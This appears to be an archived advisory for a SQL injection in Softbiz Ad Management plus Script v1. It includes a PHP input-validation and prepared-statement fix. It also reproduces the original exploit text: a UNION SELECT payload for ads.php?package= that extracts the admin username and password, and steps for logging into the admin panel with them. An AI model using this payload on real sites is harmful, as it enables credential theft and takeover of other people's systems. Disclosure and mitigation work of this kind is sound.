Vendor: Ad Management plus Script
By: IRCRASH (Dr.Crash)
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Ad Management plus Script
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO

Softbiz Ad Management plus Script ver 1 SQL INJECTION

The Softbiz Ad Management plus Script version 1 is vulnerable to SQL injection. The 'package' parameter of 'ads.php' accepts injected SQL code, and a crafted UNION SELECT passed through it returns sensitive information such as the admin username and password.

Mitigation:

To mitigate this vulnerability, sanitize and validate user input before it reaches any SQL query. Additionally, keep the software up to date with the latest patches and security updates.
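One way to apply this mitigation to the 'package' parameter, shown as an added example that is not the vendor's code: the value is accepted only as a positive integer and then bound to a prepared statement. The `packages` table, its columns and the function names are hypothetical, since the advisory does not show the original query.

```php
<?php
// Added example: the "packages" table and its columns are hypothetical;
// the advisory does not show the original query in ads.php.

// Accept only a plain positive integer for the 'package' parameter.
function parse_package_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Look the package up with a bound parameter; input never becomes SQL text.
function find_package(PDO $db, $raw): ?array
{
    $id = parse_package_id($raw);
    if ($id === null) {
        // Log a truncated, encoded copy of the rejected value for detection.
        $shown = is_string($raw) ? substr($raw, 0, 80) : gettype($raw);
        error_log('ads.php: rejected package value: ' . json_encode($shown));
        return null;
    }
    $stmt = $db->prepare('SELECT id, title FROM packages WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed in-memory schema and row so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE packages (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO packages VALUES (1, 'Constructed sample package')");

// Constructed inputs: a valid id, and a string shaped like the advisory's.
$inputs = ['1', '999999 union/**/select/**/1,2/**/from/**/sbbanners_admin/*'];
foreach ($inputs as $raw) {
    $row = find_package($db, $raw);
    echo json_encode($raw), ' => ', $row ? json_encode($row) : 'rejected', PHP_EOL;
}
```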

Exploit-DB raw data:

#####################################################################################
####            Softbiz Ad Management plus Script ver 1 SQL INJECTION            ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#Script Download : http://www.softbizscripts.com/                                   #
#                                                                                   #
#                                                                                   #
#####################################################################################
#Injection Address : http://sitename/ads.php?package=<SQL C0de>                     #
#                                                                                   #
#SQL C0de : 999999%20union/**/select/**/1,2,3,4,5,admin_name,pwd,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/from/**/sbbanners_admin/*
#                                                                                   #
#####################################################################################
#Help :                                                                             #
#                                                                                   #
#Step 1 : Register in Site                                                          #
#Step 2 : Login in User panel with your email and password                          #
#Step 3 : Go to SQL address and find admin username and password                    #
#Step 4 : Go to http://sitename/admin/ and login with admin username and password   #
#Step 5 :  :)                                                                         #
#                                                                                   #
#####################################################################################
#                                                                                   #
#Our site : Ircrash.com                                                             #
#                                                                                   #
#                                 TNX : GOD                                         #
#####################################################################################

# milw0rm.com [2007-11-11]